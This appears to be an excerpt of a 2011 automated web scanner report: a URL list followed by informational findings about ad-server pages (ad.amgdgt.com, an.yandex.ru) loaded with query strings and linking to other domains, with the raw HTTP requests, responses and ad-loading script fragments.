https://checkout.netsuite.com/s.nl/c.438708/n.1/sc.4/.f
http://direct.yandex.ru/
http://foreign.dt00.net/zones/zone25.php
http://forums.manageengine.com/fbw
http://googleads.g.doubleclick.net/pagead/ads
http://googleads.g.doubleclick.net/pagead/ads
http://googleads.g.doubleclick.net/pagead/ads
http://googleads.g.doubleclick.net/pagead/ads
http://googleads.g.doubleclick.net/pagead/ads
http://googleads.g.doubleclick.net/pagead/ads
http://googleads.g.doubleclick.net/pagead/ads
http://googleads.g.doubleclick.net/pagead/ads
http://googleads.g.doubleclick.net/pagead/ads
http://googleads.g.doubleclick.net/pagead/ads
http://googleads.g.doubleclick.net/pagead/ads
http://googleads.g.doubleclick.net/pagead/ads
http://googleads.g.doubleclick.net/pagead/ads
http://googleads.g.doubleclick.net/pagead/ads
http://googleads.g.doubleclick.net/pagead/ads
http://googleads.g.doubleclick.net/pagead/ads
http://googleads.g.doubleclick.net/pagead/viewthroughconversion/1072501689/
http://ib.adnxs.com/ab
http://ib.adnxs.com/ab
http://ideco-software.ru/products/ims/
http://js.dt00.net/public/smi/elastic/24.js
http://jsc.dt00.net/w/e/webalta.ru.1001.js
http://jsc.dt00.net/w/e/webalta.ru.1668.js
http://jsg.dt00.net/m/a/marketgid.com.i5.js
http://jsg.dt00.net/m/a/marketgid.com.i59.js
http://learn.shavlik.com/shavlik/index.cfm
http://learn.shavlik.com/shavlik/index.cfm
http://limg.imgsmail.ru/r/js/splash.js
http://nguard.com/vulnerability-assessment/
http://pixel.fetchback.com/serve/fb/pdc
http://shopping.netsuite.com/s.nl
http://storage.trafic.ro/js/trafic.js
http://tengrinews.kz/static/js/twitter.js
http://tengrinews.kz/tag/891/
http://webalta.ru/news.html
https://www.controlscan.com/checkout_invalid.php
https://www.controlscan.com/shoppingcart.php
http://www.depthsecurity.com/
http://www.eset.com/us/business/products
http://www.facebook.com/plugins/like.php
http://www.google.com/url
http://www.google.com/url
http://www.google.com/url
http://www.googleadservices.com/pagead/conversion/1072501689/
http://www.iveco-ptc.spb.ru/
http://www.manageengine.com/products/security-manager/
http://www.manageengine.com/products/security-manager/download.html
http://www.outpost24.com/
http://www.praetorian.com/external-network-penetration-test.html
http://www.smpone.com/
http://www.stillsecure.com/m/
http://www.trucklist.ru/cars/trucks

22.1. http://ad.amgdgt.com/ads/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.amgdgt.com
Path:	/ads/

Issue detail

The page was loaded from a URL containing a query string:

http://ad.amgdgt.com/ads/?t=i&f=j&p=5112&pl=bad56300&rnd=97383008780889220&clkurl=http://ib.adnxs.com/click/AAAAAAAAFEAAAAAAAAAUQAAAAMDMzABA4XoUrkfhFEDhehSuR-EUQICU8FEmC1Z8SsYda6b2ziU-g7VNAAAAAIAeAQC1AAAAlgIAAAIAAADHpAIA0WMAAAEAAABVU0QAVVNEACwB-gA3CRQE4ggBAgUCAAMAAAAAkxzWVwAAAAA./cnd=!wA_Htwjc8wIQx8kKGAAg0ccBKJQIMQAAALxH4RRAQgoIABAAGAAgASgBQgsIn0YQABgAIAMoAUILCJ9GEAAYACACKAFIAVAAWLcSYABolgU./referrer=http%3A%2F%2Fwww.livejournal.com%2F/clickenc=http%3A%2F%2Fadclick.g.doubleclick.net%2Faclk%3Fsa%3Dl%26ai%3DBJSjBPoO1TZvTCJDvlQfqvNzyB9fq-NMBl6GU7BiXn6ezIQAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi00NDU2MTgyMTM1OTU2OTc0oAHD8v3sA7IBE3d3dy5saXZlam91cm5hbC5jb226AQozMDB4MjUwX2FzyAEJ2gEbaHR0cDovL3d3dy5saXZlam91cm5hbC5jb20vmAKIJ8ACBMgChdLPCuACAOoCGjU2NTUvbGouaG9tZXBhZ2UvbG9nZ2Vkb3V0qAMB6AP4A_UDCACAhOAEAYAG6cSF9MWQ1oky%26num%3D1%26sig%3DAGiWqtxmq8nW3CGfJ8RQnem9Ve-Gn6Ps_g%26client%3Dca-pub-4456182135956974%26adurl%3D

The response contains the following links to other domains:

http://b.scorecardresearch.com/p?c1=8&c2=6035179&c3=1&c4=69112&c5=166308&c6=&cv=1.3&cj=1&rn=156936241
http://servedby.adxpose.com/adxpose/find_ad.js
http://view.atdmt.com/TLC/jview/253732017/direct/01/rnd=1043494379?click=http://ad.amgdgt.com/ads/t=c/s=AAAAAQAUlNedbcTg0PaihQfN8uf83YXzbLhnZW8sdXNhLHQsMTMwMzc0MTI0OTEwMCxjLDI4OTY2OSxwYyw2OTExMixhYywxNjYzMDgsbyxOMC1TMCxsLDU1MzY1LHBjbGljayxodHRwOi8vaWIuYWRueHMuY29tL2NsaWNrL0FBQUFBQUFBRkVBQUFBQUFBQUFVUUFBQUFNRE16QUJBNFhvVXJrZmhGRURoZWhTdVItRVVRSUNVOEZFbUMxWjhTc1lkYTZiMnppVS1nN1ZOQUFBQUFJQWVBUUMxQUFBQWxnSUFBQUlBQUFESHBBSUEwV01BQUFFQUFBQlZVMFFBVlZORUFDd0ItZ0EzQ1JRRTRnZ0JBZ1VDQUFNQUFBQUFreHpXVndBQUFBQS4vY25kPSF3QV9IdHdqYzh3SVF4OGtLR0FBZzBjY0JLSlFJTVFBQUFMeEg0UlJBUWdvSUFCQUFHQUFnQVNnQlFnc0luMFlRQUJnQUlBTW9BVUlMQ0o5R0VBQVlBQ0FDS0FGSUFWQUFXTGNTWUFCb2xnVS4vcmVmZXJyZXI9aHR0cDovL3d3dy5saXZlam91cm5hbC5jb20vL2NsaWNrZW5jPWh0dHA6Ly9hZGNsaWNrLmcuZG91YmxlY2xpY2submV0L2FjbGs_c2E9bCZhaT1CSlNqQlBvTzFUWnZUQ0pEdmxRZnF2Tnp5QjlmcS1OTUJsNkdVN0JpWG42ZXpJUUFRQVJnQklBQTRBVkNBeC1IRUJHREo3b09JOEtQc0VvSUJGMk5oTFhCMVlpMDBORFUyTVRneU1UTTFPVFUyT1RjMG9BSEQ4djNzQTdJQkUzZDNkeTVzYVhabGFtOTFjbTVoYkM1amIyMjZBUW96TURCNE1qVXdYMkZ6eUFFSjJnRWJhSFIwY0RvdkwzZDNkeTVzYVhabGFtOTFjbTVoYkM1amIyMHZtQUtJSjhBQ0JNZ0NoZExQQ3VBQ0FPb0NHalUyTlRVdmJHb3VhRzl0WlhCaFoyVXZiRzluWjJWa2IzVjBxQU1CNkFQNEFfVURDQUNBaE9BRUFZQUc2Y1NGOU1XUTFva3kmbnVtPTEmc2lnPUFHaVdxdHhtcThuVzNDR2ZKOFJRbmVtOVZlLUduNlBzX2cmY2xpZW50PWNhLXB1Yi00NDU2MTgyMTM1OTU2OTc0JmFkdXJsPQo-/clkurl=
http://view.atdmt.com/TLC/view/253732017/direct/01/rnd=1043494379
http://view.c3metrics.com/v.js?id=adcon&cid=480&t=72

Request

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: UA=AAAAAQAUxOdW3WQldyr.xNlqt1dY_m2yKF0DA3gBY2BgEGFg6lzCwJLdysDI.4OB4YYrAwMDJwMDo34vxzZvqFwLUO4nUM4NIefSj0uuIzvmFE65JLfrOOUivK7hlPObEIJTzrWBAyrXBnTnd6A7XWDu7JBwv41Tn4SdNi597Sd3bsKlr_3kjFqccieEF.OUO7bgEU65o18FccrNWMCOW862Fafc9IeeuOU6VuKWM9XFKTftpiIwbBlxyld2CwHlGXy37Gxg4AAmpJ2MjIwMDIG3GJmBFIMBE4MIiK9gBhZeWgAWZslkZAMKsoQwsTGyAxnyu5gYuEHKwGnQB2QeAwMAUdqQwA--; Domain=.amgdgt.com; Expires=Wed, 25-May-2011 14:20:49 GMT; Path=/
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Cache-Control: no-cache, no-store
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/javascript;charset=UTF-8
Content-Length: 3919
Date: Mon, 25 Apr 2011 14:20:48 GMT

_289669_amg_acamp_id=166308;
_289669_amg_pcamp_id=69112;
_289669_amg_location_id=55365;
_289669_amg_creative_id=289669;
_289669_amg_loaded=true;
var _amg_289669_content='<script type="text/javascript"
...[SNIP]...
</script> <script src="http://servedby.adxpose.com/adxpose/find_ad.js" type="text/javascript" charset="utf-8"></script>\n'+
'\n'+
'<script language="JavaScript" type="text/javascript" src="http://view.atdmt.com/TLC/jview/253732017/direct/01/rnd=1043494379?click=http://ad.amgdgt.com/ads/t=c/s=AAAAAQAUlNedbcTg0PaihQfN8uf83YXzbLhnZW8sdXNhLHQsMTMwMzc0MTI0OTEwMCxjLDI4OTY2OSxwYyw2OTExMixhYywxNjYzMDgsbyxOMC1TMCxsLDU1MzY1LHBjbGljayxodHRwOi8vaWIuYWRueHMuY29tL2NsaWNrL0FBQUFBQUFBRkVBQUFBQUFBQUFVUUFBQUFNRE16QUJBNFhvVXJrZmhGRURoZWhTdVItRVVRSUNVOEZFbUMxWjhTc1lkYTZiMnppVS1nN1ZOQUFBQUFJQWVBUUMxQUFBQWxnSUFBQUlBQUFESHBBSUEwV01BQUFFQUFBQlZVMFFBVlZORUFDd0ItZ0EzQ1JRRTRnZ0JBZ1VDQUFNQUFBQUFreHpXVndBQUFBQS4vY25kPSF3QV9IdHdqYzh3SVF4OGtLR0FBZzBjY0JLSlFJTVFBQUFMeEg0UlJBUWdvSUFCQUFHQUFnQVNnQlFnc0luMFlRQUJnQUlBTW9BVUlMQ0o5R0VBQVlBQ0FDS0FGSUFWQUFXTGNTWUFCb2xnVS4vcmVmZXJyZXI9aHR0cDovL3d3dy5saXZlam91cm5hbC5jb20vL2NsaWNrZW5jPWh0dHA6Ly9hZGNsaWNrLmcuZG91YmxlY2xpY2submV0L2FjbGs_c2E9bCZhaT1CSlNqQlBvTzFUWnZUQ0pEdmxRZnF2Tnp5QjlmcS1OTUJsNkdVN0JpWG42ZXpJUUFRQVJnQklBQTRBVkNBeC1IRUJHREo3b09JOEtQc0VvSUJGMk5oTFhCMVlpMDBORFUyTVRneU1UTTFPVFUyT1RjMG9BSEQ4djNzQTdJQkUzZDNkeTVzYVhabGFtOTFjbTVoYkM1amIyMjZBUW96TURCNE1qVXdYMkZ6eUFFSjJnRWJhSFIwY0RvdkwzZDNkeTVzYVhabGFtOTFjbTVoYkM1amIyMHZtQUtJSjhBQ0JNZ0NoZExQQ3VBQ0FPb0NHalUyTlRVdmJHb3VhRzl0WlhCaFoyVXZiRzluWjJWa2IzVjBxQU1CNkFQNEFfVURDQUNBaE9BRUFZQUc2Y1NGOU1XUTFva3kmbnVtPTEmc2lnPUFHaVdxdHhtcThuVzNDR2ZKOFJRbmVtOVZlLUduNlBzX2cmY2xpZW50PWNhLXB1Yi00NDU2MTgyMTM1OTU2OTc0JmFkdXJsPQo-/clkurl=">\n'+
'</script>
...[SNIP]...
MlV2Ykc5bloyVmtiM1YwcUFNQjZBUDRBX1VEQ0FDQWhPQUVBWUFHNmNTRjlNV1Exb2t5Jm51bT0xJnNpZz1BR2lXcXR4bXE4blczQ0dmSjhSUW5lbTlWZS1HbjZQc19nJmNsaWVudD1jYS1wdWItNDQ1NjE4MjEzNTk1Njk3NCZhZHVybD0K&j=" target="_blank"><img border="0" src="http://view.atdmt.com/TLC/view/253732017/direct/01/rnd=1043494379" /></a></noscript><img src="http://b.scorecardresearch.com/p?c1=8&c2=6035179&c3=1&c4=69112&c5=166308&c6=&cv=1.3&cj=1&rn=156936241" style="display:none" width="0" height="0" alt="" />\n'+
'\n'+
'<script type="text/javascript" src="http://view.c3metrics.com/v.js?id=adcon&cid=480&t=72"></script>
...[SNIP]...

22.2. http://ad.amgdgt.com/ads/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.amgdgt.com
Path:	/ads/

Issue detail

The page was loaded from a URL containing a query string:

http://ad.amgdgt.com/ads/?t=i&f=j&p=5112&pl=bca52e1b&rnd=71518370253033940&clkurl=http://ib.adnxs.com/click/H4XrUbgeA0AfhetRuB4DQAAAAMDMzAhAzczMzMzMCEDNzMzMzMwIQOtg8QHzcr0bSsYda6b2ziUhg7VNAAAAAC8hAAC1AAAAlgIAAAIAAADGpAIA0WMAAAEAAABVU0QAVVNEAKAAWAJ_Ck8AhwQBAgUCAAQAAAAAfyWMQQAAAAA./cnd=!0xVmYQj25QIQxskKGAAg0ccBKE8xAAAAwMzMCEBCEwgAEAAYACABKP7__________wFIAFAAWP8UYABolgU./referrer=http%3A%2F%2Fgames.webalta.ru%2F/clickenc=http%3A%2F%2Fgoogleads.g.doubleclick.net%2Faclk%3Fsa%3Dl%26ai%3DB2DbrIIO1TeCtIcfMsQevr63kDdfq-NMBn6CU7BjbxO3UHAAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi0xMTM0ODIyNjgyNTEwODc5oAHD8v3sA7IBEGdhbWVzLndlYmFsdGEucnW6AQoxNjB4NjAwX2FzyAEJ2gEYaHR0cDovL2dhbWVzLndlYmFsdGEucnUvmALWEsACBMgChdLPCqgDAegDaegD1AfoA8EC9QMAAADEgAbot86qwY6yhtEB%26num%3D1%26sig%3DAGiWqtyp--SO2lIMceltajJwn2qFCTNn3A%26client%3Dca-pub-1134822682510879%26adurl%3D

The response contains the following links to other domains:

http://b.scorecardresearch.com/p?c1=8&c2=6035179&c3=1&c4=69113&c5=166308&c6=&cv=1.3&cj=1&rn=1508694624
http://servedby.adxpose.com/adxpose/find_ad.js
http://view.atdmt.com/TLC/jview/253732016/direct/01/rnd=499353087?click=http://ad.amgdgt.com/ads/t=c/s=AAAAAQAUiPbw6T2uHVm68iJ.eWaH0XWjcghnZW8sdXNhLHQsMTMwMzc0MTM5MzU2NCxjLDI4OTY2OCxwYyw2OTExMyxhYywxNjYzMDgsbyxOMC1TMCxsLDU1MzY2LHBjbGljayxodHRwOi8vaWIuYWRueHMuY29tL2NsaWNrL0g0WHJVYmdlQTBBZmhldFJ1QjREUUFBQUFNRE16QWhBemN6TXpNek1DRUROek16TXpNd0lRT3RnOFFIemNyMGJTc1lkYTZiMnppVWhnN1ZOQUFBQUFDOGhBQUMxQUFBQWxnSUFBQUlBQUFER3BBSUEwV01BQUFFQUFBQlZVMFFBVlZORUFLQUFXQUpfQ2s4QWh3UUJBZ1VDQUFRQUFBQUFmeVdNUVFBQUFBQS4vY25kPSEweFZtWVFqMjVRSVF4c2tLR0FBZzBjY0JLRTh4QUFBQXdNek1DRUJDRXdnQUVBQVlBQ0FCS1A3X19fX19fX19fX3dGSUFGQUFXUDhVWUFCb2xnVS4vcmVmZXJyZXI9aHR0cDovL2dhbWVzLndlYmFsdGEucnUvL2NsaWNrZW5jPWh0dHA6Ly9nb29nbGVhZHMuZy5kb3VibGVjbGljay5uZXQvYWNsaz9zYT1sJmFpPUIyRGJySUlPMVRlQ3RJY2ZNc1FldnI2M2tEZGZxLU5NQm42Q1U3QmpieE8zVUhBQVFBUmdCSUFBNEFWQ0F4LUhFQkdESjdvT0k4S1BzRW9JQkYyTmhMWEIxWWkweE1UTTBPREl5TmpneU5URXdPRGM1b0FIRDh2M3NBN0lCRUdkaGJXVnpMbmRsWW1Gc2RHRXVjblc2QVFveE5qQjROakF3WDJGenlBRUoyZ0VZYUhSMGNEb3ZMMmRoYldWekxuZGxZbUZzZEdFdWNuVXZtQUxXRXNBQ0JNZ0NoZExQQ3FnREFlZ0RhZWdEMUFmb0E4RUM5UU1BQUFERWdBYm90ODZxd1k2eWh0RUImbnVtPTEmc2lnPUFHaVdxdHlwLS1TTzJsSU1jZWx0YWpKd24ycUZDVE5uM0EmY2xpZW50PWNhLXB1Yi0xMTM0ODIyNjgyNTEwODc5JmFkdXJsPQo-/clkurl=
http://view.atdmt.com/TLC/view/253732016/direct/01/rnd=499353087
http://view.c3metrics.com/v.js?id=adcon&cid=480&t=72

Request

GET /ads/?t=i&f=j&p=5112&pl=bca52e1b&rnd=71518370253033940&clkurl=http://ib.adnxs.com/click/H4XrUbgeA0AfhetRuB4DQAAAAMDMzAhAzczMzMzMCEDNzMzMzMwIQOtg8QHzcr0bSsYda6b2ziUhg7VNAAAAAC8hAAC1AAAAlgIAAAIAAADGpAIA0WMAAAEAAABVU0QAVVNEAKAAWAJ_Ck8AhwQBAgUCAAQAAAAAfyWMQQAAAAA./cnd=!0xVmYQj25QIQxskKGAAg0ccBKE8xAAAAwMzMCEBCEwgAEAAYACABKP7__________wFIAFAAWP8UYABolgU./referrer=http%3A%2F%2Fgames.webalta.ru%2F/clickenc=http%3A%2F%2Fgoogleads.g.doubleclick.net%2Faclk%3Fsa%3Dl%26ai%3DB2DbrIIO1TeCtIcfMsQevr63kDdfq-NMBn6CU7BjbxO3UHAAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi0xMTM0ODIyNjgyNTEwODc5oAHD8v3sA7IBEGdhbWVzLndlYmFsdGEucnW6AQoxNjB4NjAwX2FzyAEJ2gEYaHR0cDovL2dhbWVzLndlYmFsdGEucnUvmALWEsACBMgChdLPCqgDAegDaegD1AfoA8EC9QMAAADEgAbot86qwY6yhtEB%26num%3D1%26sig%3DAGiWqtyp--SO2lIMceltajJwn2qFCTNn3A%26client%3Dca-pub-1134822682510879%26adurl%3D HTTP/1.1
Host: ad.amgdgt.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-1134822682510879&output=html&h=600&slotname=3061072279&w=160&lmt=1303759227&flash=10.2.154&url=http%3A%2F%2Fgames.webalta.ru%2F&dt=1303741227549&bpp=5&shv=r20110420&jsv=r20110415&correlator=1303741227571&frm=0&adk=1110337129&ga_vid=973557293.1303741228&ga_sid=1303741228&ga_hid=154889240&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1125&bih=929&fu=0&ifi=1&dtd=35&xpc=naYdoqC7iz&p=http%3A//games.webalta.ru
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ID=AAAAAQAU6fB5bLIqJTbWvlzW3Ft0OcZJYxcAANGoPMSHa0D5h6539_dUjA0AAAEvZiIaJw--; LO=AAAAAQAUYn__ZmG8acLIZhvDLvm3d2V86m4BAHVzYTt2dDs1MjM7c3Rvd2U7MDU2NzI7c29mdGxheWVyIHRlY2hub2xvZ2llcyBpbmMuO2Jyb2FkYmFuZDsxNzMuMTkzLjIxNC4yNDM-; UA=AAAAAQAUhvvA3uMYtZiectC07uf2QDyvEasDA3gBY2BgEGFg6lzCwJLdwsDI.5OB4YYbAwMDJwMDo35HdswpnHJJbtdxykV4XcMp5zchBKecawMHVK4N6JbvQLe4wN0i4X4bpz4JO21c.tpP7tyES1_7yRm1OOVOCC_GKXdswSOccke_CuKUm7GAHbecbStOuekPPXHLdazELWeqi1Nu2k1FnHKVZb4MTJNDGVgdnjAw6uQxMHwU.g8EoDSRH8BYDYwTRtx6u4WA8gy.mzMYGDiACWknI1AxQ.AtRiYgxWDAyCDMwKBgBhZcWgAWZMlkZAXKsYQwsTKyARnyuxgZeODpD2QYAwCGTZPB

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: UA=AAAAAQAUlAz8J7YZQuuVKsw_ef0aAc0zrdADA3gBY2BgEGFg6lzCwJLdwsDI.5OB4YYbAwMDJwMDo34v16vZuOQ6smNO4ZRLcruOUy7C6xpOOb8JITjlXBs4oHJtQHd.B7rTBebODgn32zj1Sdhp49LXfnLnJlz62k_OqMUpd0J4MU65Ywse4ZQ7.lUQp9yMBey45WxbccpNf.iJW65jJW45U12cctNuKuKUqyzzBYY7I275biGgPIPvlp0NDBzAhLSTkZGRgSHwFiMzkGIwYGIQBvEVzMDCSwvAwiyZjGxAQZYQJjZGdiBDfhcTAzdIGTQNggxkAAAFopIm; Domain=.amgdgt.com; Expires=Wed, 25-May-2011 14:23:13 GMT; Path=/
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Cache-Control: no-cache, no-store
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/javascript;charset=UTF-8
Content-Length: 3734
Date: Mon, 25 Apr 2011 14:23:13 GMT

_289668_amg_acamp_id=166308;
_289668_amg_pcamp_id=69113;
_289668_amg_location_id=55366;
_289668_amg_creative_id=289668;
_289668_amg_loaded=true;
var _amg_289668_content='<script type="text/javascript"
...[SNIP]...
</script> <script src="http://servedby.adxpose.com/adxpose/find_ad.js" type="text/javascript" charset="utf-8"></script>\n'+
'\n'+
'<script language="JavaScript" type="text/javascript" src="http://view.atdmt.com/TLC/jview/253732016/direct/01/rnd=499353087?click=http://ad.amgdgt.com/ads/t=c/s=AAAAAQAUiPbw6T2uHVm68iJ.eWaH0XWjcghnZW8sdXNhLHQsMTMwMzc0MTM5MzU2NCxjLDI4OTY2OCxwYyw2OTExMyxhYywxNjYzMDgsbyxOMC1TMCxsLDU1MzY2LHBjbGljayxodHRwOi8vaWIuYWRueHMuY29tL2NsaWNrL0g0WHJVYmdlQTBBZmhldFJ1QjREUUFBQUFNRE16QWhBemN6TXpNek1DRUROek16TXpNd0lRT3RnOFFIemNyMGJTc1lkYTZiMnppVWhnN1ZOQUFBQUFDOGhBQUMxQUFBQWxnSUFBQUlBQUFER3BBSUEwV01BQUFFQUFBQlZVMFFBVlZORUFLQUFXQUpfQ2s4QWh3UUJBZ1VDQUFRQUFBQUFmeVdNUVFBQUFBQS4vY25kPSEweFZtWVFqMjVRSVF4c2tLR0FBZzBjY0JLRTh4QUFBQXdNek1DRUJDRXdnQUVBQVlBQ0FCS1A3X19fX19fX19fX3dGSUFGQUFXUDhVWUFCb2xnVS4vcmVmZXJyZXI9aHR0cDovL2dhbWVzLndlYmFsdGEucnUvL2NsaWNrZW5jPWh0dHA6Ly9nb29nbGVhZHMuZy5kb3VibGVjbGljay5uZXQvYWNsaz9zYT1sJmFpPUIyRGJySUlPMVRlQ3RJY2ZNc1FldnI2M2tEZGZxLU5NQm42Q1U3QmpieE8zVUhBQVFBUmdCSUFBNEFWQ0F4LUhFQkdESjdvT0k4S1BzRW9JQkYyTmhMWEIxWWkweE1UTTBPREl5TmpneU5URXdPRGM1b0FIRDh2M3NBN0lCRUdkaGJXVnpMbmRsWW1Gc2RHRXVjblc2QVFveE5qQjROakF3WDJGenlBRUoyZ0VZYUhSMGNEb3ZMMmRoYldWekxuZGxZbUZzZEdFdWNuVXZtQUxXRXNBQ0JNZ0NoZExQQ3FnREFlZ0RhZWdEMUFmb0E4RUM5UU1BQUFERWdBYm90ODZxd1k2eWh0RUImbnVtPTEmc2lnPUFHaVdxdHlwLS1TTzJsSU1jZWx0YWpKd24ycUZDVE5uM0EmY2xpZW50PWNhLXB1Yi0xMTM0ODIyNjgyNTEwODc5JmFkdXJsPQo-/clkurl=">\n'+
'</script>
...[SNIP]...
Z0NoZExQQ3FnREFlZ0RhZWdEMUFmb0E4RUM5UU1BQUFERWdBYm90ODZxd1k2eWh0RUImbnVtPTEmc2lnPUFHaVdxdHlwLS1TTzJsSU1jZWx0YWpKd24ycUZDVE5uM0EmY2xpZW50PWNhLXB1Yi0xMTM0ODIyNjgyNTEwODc5JmFkdXJsPQo-&j=" target="_blank"><img border="0" src="http://view.atdmt.com/TLC/view/253732016/direct/01/rnd=499353087" /></a></noscript><img src="http://b.scorecardresearch.com/p?c1=8&c2=6035179&c3=1&c4=69113&c5=166308&c6=&cv=1.3&cj=1&rn=1508694624" style="display:none" width="0" height="0" alt="" />\n'+
'\n'+
'<script type="text/javascript" src="http://view.c3metrics.com/v.js?id=adcon&cid=480&t=72"></script>
...[SNIP]...

22.3. http://an.yandex.ru/code/57617 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://an.yandex.ru
Path:	/code/57617

Issue detail

The page was loaded from a URL containing a query string:

http://an.yandex.ru/code/57617?rnd=281388&direct-limit=9&charset=utf-8&block-origin=2&page-ref=&target-ref=http%3A%2F%2Fwebalta.ru%2Fnews.html%3F14857%231&grab=dNCSINCw0LzQtdGA0LjQutCw0L3RgdC60L7QuSDQs9C70YPQsdC40L3QutC1INC90LDRiNC70Lgg0YDQtdC00YfQsNC50YjRg9GOINC40L3QutGD0L3QsNCx0YPQu9GD

The response contains the following links to other domains:

http://advertising.yandex.ru/welcome/?from=context
http://direct.yandex.ru/search?from=http://webalta.ru/news.html%3F14857%231&ref-page=57617

Request

GET /code/57617?rnd=281388&direct-limit=9&charset=utf-8&block-origin=2&page-ref=&target-ref=http%3A%2F%2Fwebalta.ru%2Fnews.html%3F14857%231&grab=dNCSINCw0LzQtdGA0LjQutCw0L3RgdC60L7QuSDQs9C70YPQsdC40L3QutC1INC90LDRiNC70Lgg0YDQtdC00YfQsNC50YjRg9GOINC40L3QutGD0L3QsNCx0YPQu9GD HTTP/1.1
Host: an.yandex.ru
Proxy-Connection: keep-alive
Referer: http://webalta.ru/news.html?14857
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: yandexuid=1981869761303741204; yabs-uvf=0000000000000000

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 14:32:04 GMT
Server: Phantom/0.0.0
P3P: CP="NOI DEVa TAIa OUR BUS UNI STA"
Last-Modified: Mon, 25 Apr 2011 14:32:04 GMT
Expires: Mon, 25 Apr 2011 14:32:04 GMT
Cache-Control: private, no-cache, no-store, must-revalidate, max-age=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Set-Cookie: yabs-uvf=0000000000000000; domain=an.yandex.ru; path=/; expires=Mon, 02-May-2011 14:32:04 GMT
Content-Length: 6529

var y5_sLinkHead = 'http://an.yandex.ru/count/6c8D5kaQUsO40000ZhHUMDi4XP4H3f6nxk6s0PDKfC00040C27a3';
var y5_iDirectCounter = 0;
var y5_iDirectAdsCounter = 0;

function yandex_direct_print() {
if (win
...[SNIP]...
</span>','=fWlZM9K2cm5kGpa1YPyID9YD79ol96Arcgx8GZIIf8FR7PsJZWAFhnEXOf-tLbB-3vbfe91n0gU04q5_1W00','0'] ];
var aLinkHow = ['<a target="_blank" href="http://advertising.yandex.ru/welcome/?from=context">........ ....................</a>','=s3ihHfK2cmHhK3i1agPnRWoFll97v0AVjn3RzWMam00000m8U0G0'];
var aLinkAll = ['<a href="http://direct.yandex.ru/search?from=http://webalta.ru/news.html%3F14857%231&ref-page=57617" target=_blank>...... ....................</a>
...[SNIP]...

22.4. http://an.yandex.ru/code/57617 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://an.yandex.ru
Path:	/code/57617

Issue detail

The page was loaded from a URL containing a query string:

http://an.yandex.ru/code/57617?rnd=29605&direct-limit=9&charset=utf-8&block-origin=2&page-ref=&target-ref=http%3A%2F%2Fwebalta.ru%2Fnews.html&grab=dNCSINCw0LzQtdGA0LjQutCw0L3RgdC60L7QuSDQs9C70YPQsdC40L3QutC1INC90LDRiNC70Lgg0YDQtdC00YfQsNC50YjRg9GOINC40L3QutGD0L3QsNCx0YPQu9GD

The response contains the following links to other domains:

http://advertising.yandex.ru/welcome/?from=context
http://direct.yandex.ru/search?from=http://webalta.ru/news.html&ref-page=57617

Request

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 14:20:09 GMT
Server: Phantom/0.0.0
P3P: CP="NOI DEVa TAIa OUR BUS UNI STA"
Last-Modified: Mon, 25 Apr 2011 14:20:09 GMT
Expires: Mon, 25 Apr 2011 14:20:09 GMT
Cache-Control: private, no-cache, no-store, must-revalidate, max-age=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Set-Cookie: yabs-uvf=0000000000000000; domain=an.yandex.ru; path=/; expires=Mon, 02-May-2011 14:20:09 GMT
Content-Length: 6626

var y5_sLinkHead = 'http://an.yandex.ru/count/J9i6sP-l6Xu40000ZhanMDi4XP4H3fQl8qgkaQbw69MJLAJE000030Xz0m00';
var y5_iDirectCounter = 0;
var y5_iDirectAdsCounter = 0;

function yandex_direct_print() {

...[SNIP]...
</span>','=FiNnVvK2cm5kGpa1YQHnPpAOM9ouVOzJ0PgeI45PagCd7nkTer610O-xcdbd19-o2bGc39aEe91n0gU4U45w1m00','0'] ];
var aLinkHow = ['<a target="_blank" href="http://advertising.yandex.ru/welcome/?from=context">........ ....................</a>','=J1j5YPK2cmHhK3i1cfBX59AcSMuCZxvQBdC1dx8uiR4FfC00000C27m4'];
var aLinkAll = ['<a href="http://direct.yandex.ru/search?from=http://webalta.ru/news.html&ref-page=57617" target=_blank>...... ....................</a>
...[SNIP]...

22.5. http://an.yandex.ru/code/57617 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://an.yandex.ru
Path:	/code/57617

Issue detail

The page was loaded from a URL containing a query string:

http://an.yandex.ru/code/57617?rnd=309442&direct-limit=9&charset=utf-8&block-origin=2&page-ref=&target-ref=http%3A%2F%2Fwebalta.ru%2F&grab=dNCf0L7QuNGB0LrQvtCy0LDRjyDRgdC40YHRgtC10LzQsCBXZWJhbHRh

The response contains the following links to other domains:

http://advertising.yandex.ru/welcome/?from=context
